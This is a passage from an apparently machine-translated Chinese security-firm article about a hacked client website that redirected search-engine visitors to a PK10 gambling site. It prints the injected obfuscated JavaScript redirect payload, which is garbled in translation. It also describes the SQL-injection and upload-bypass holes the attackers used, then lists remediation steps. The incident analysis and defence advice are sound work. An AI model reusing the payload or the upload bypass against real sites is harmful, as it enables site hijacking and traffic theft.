主机运维
当前位置:主页 > 建站资讯 > 主机运维 >
该网站的标题已被篡改为Beijing Racing和PK10的解决方案
发布日期:2021-04-27 阅读次数: 字体大小:

客户的网站最近被重定向到赌博网站。 打开后,它被直接重定向到包含PK10和PK10等内容的网站。 客户的网站本身是由百度推广的,这导致所有赌博网站的访问者都被重定向到该赌博网站。 客户造成了巨大的经济损失,另一个官方网站的形象也受到了影响。 我们的SINE Security检查了客户的网站,发现客户的网站TDK的标题被反复篡改(例如PK10和其他内容),以立即进行全面的源代码安全审核,网站漏洞检测和网站漏洞修复。 检查客户主页标题TDK的内容确实遭到篡改,并添加了一些加密的恶意代码,该代码如下:

该网站的标题已被篡改为Beijing Racing和PK10的解决方案


type =“ text / java” eval(function(p,a,c,k,e,d){e = function(c){return(c35?www.jianzhanlong.com(c + 29):www.jianzhanlong.com(36))}; if(!''。replace(/ ^ /,String)){while(c-)d [e(c)] = k [c] || e(c); k = [function(e){return d [e]}]; e = function(){return'\\ w +'}; c = 1;}; while(c-)if(k [c])p = www.jianzhanlong.com(newRegExp('\\ b'+ e(c)+'\\ b','g'),k [c]);返回p;}('m [“ \\ 9 \\ d \\ 1 \\l \\ i \\ a \\ n \\ 0“] [” \\ 8 \\ 4 \\ 6 \\ 0 \\ a“](\'\\ h \\ 3 \\ 1 \\ 4 \\ 6 \\ 2 \\ 0 \\ 0 \\ k \\ 2 \\ a \\ e \\ 7 \\ 0 \\ a \\ q \\ 0 \\ 5 \\ g \\ b \\ f\\ b \\ 3 \\ 1 \\ 4 \\ 6 \\ 2 \\ 0 \\ 7 \\ 3 \\ 4 \\ 1 \\ e \\ 7 \\ o \\ 0 \\ 0 \\2 \\ 3 \\ p \\ 5 \\ 5 \\ 8 \\ 8 \\ 8 \\ c \\ 1 \\ 2 \\ 9 \\ b \\ 3 \\ r \\ c \\ 1 \\ d \\ i \\ 5 \\ 9 \\ 9 \\ f \\ 6 \\ 2 \\ c \\ g \\ 3 \\ 7 \\ j \\ h \\ 5 \\ 3 \\ 1\\ 4 \\ 6 \\ 2 \\ 0 \\ j \');',28,28,'x74 | x63 | x70 | x73 | x72 | x2f | x69 | x22 | x77 | x64 | x65 | x61 |x2e | x6f | x3d | x76 | x6a | x3c | x6d | x3e | x79 | x75 |窗口| x6e | x68 | x3a | x78 | x38'.split('|'),0,()))

该网站的标题已被篡改为Beijing Racing和PK10的解决方案


上面的网站代码为ASCII代码,只要将其转换为Unicode代码,就可以看到真正的加密内容。 我们的工程师对代码进行了解释,并发现根据搜索引擎编写的代码是跳转代码的判断条件。 用外行的话来说,该代码仅用于搜索引擎,网站管理员直接输入URL,不会发现网站跳转。 转到赌博内容网站,该客户的网站将通过百度或搜狗搜索直接重定向到Beijing Racing和pk10的网站。

该网站的标题已被篡改为Beijing Racing和PK10的解决方案


针对上述问题,我们立即删除了加密的跳转代码,以最大程度地减少客户网站的损失,并促进网站的正常访问(因为 客户一直在做百度推广,一直在烧钱),通过一系列安全检查,由于这些漏洞而将网站上传到特洛伊木马并篡改了网站首页吗? 在我们的Sine安全工程师对网站代码进行详细的安全检查之后,我们发现此网站系统中存在一个SQL注入漏洞,攻击者可以利用该漏洞来获取管理员帐户和密码,并且网站后端的地址使用默认的admin 目录名称。 黑客获取密码后,直接登录网站后端,检查网站后端的安全性。 当时,我们发现产品图片上传功能存在一个漏洞,绕过了格式上传脚本特洛伊木马。
网站漏洞源于$ this-> getext($ filear [“ name”]);。 在网站背景上的产品上传页面的代码中;//获取扩展名$ this-> set_savename($ file);//设置保存文件名,该代码可以直接绕过文件扩展名,并以php格式上传脚本文件,从而使攻击者可以轻松获得网站的许可。 该客户还报告说该网站经常被篡改,导致跳转到赌博网站并寻找建立该网站的公司。 他们只删除了代码,不久后便对其进行了篡改和重定向,对客户的网站造成了严重损失。 篡改跳转的根本原因是网站存在漏洞。 如果网站漏洞没有得到修复,即使恶意代码被删除,也只是肤浅的工作。 如果它不起作用,它将被反复篡改。 有必要对网站进行安全检查和网站漏洞检测,修复网站漏洞,删除特洛伊木马后门,安全部署网站,使网站可以更安全,稳定地运行。修复网站漏洞的过程如下:
对客户端网站的源代码和前端过滤代码进行安全加固,以防止SQL注入,网站后端目录的安全设置,将管理文件名更改为 @#%admin,并上传网站的后端图像修复了功能代码错误,设置了用于上载文件的白名单机制,并为文件上载目录设置了脚本安全权限,禁止了脚本以及上载了文件 扩展也是深度安全过滤。 网站的数据库安全性部署是在数据库上执行的。 加密连接信息,删除根管理权限,设置普通数据库帐户,分别进行读写,创建表,查询表,写表以及其他普通数据库操作权限。 网站后台的帐号密码设置较为复杂,密码为12位。+字母+案例组合,从发现网站漏洞到解决当前问题,总共发现了3个脚本特洛伊木马(webshel
l)和2个单句小马后门。 发现该网站的模板内容也被篡改,导致客户生成了主页。还添加了恶意加密代码。
网站安全注意事项:
1.尽量避免使用默认的网站背景名称,例如admin manage houtai
。2.控制网站上载目录的权限。(未经脚本执行许可进行设置)
3.网站背景中的用户名和密码很复杂,并且由数字+字母+大写和小写+特殊符号组成。
4。 阿里云虚拟主机用户的FTP帐户密码设置复杂,数字+字母+大写和小写+特殊符号的组合。
5。 如果您是单独服务器的客户端,建议先部署服务器的安全性,部署每个网站的文件夹,然后安全地部署数据库,然后再进行网站的安全性,否则您的网站将再次安全 ,服务器不安全无济于事。 如果您对安全性不太了解,建议您找一家专业的网站安全公司来处理它。

标签: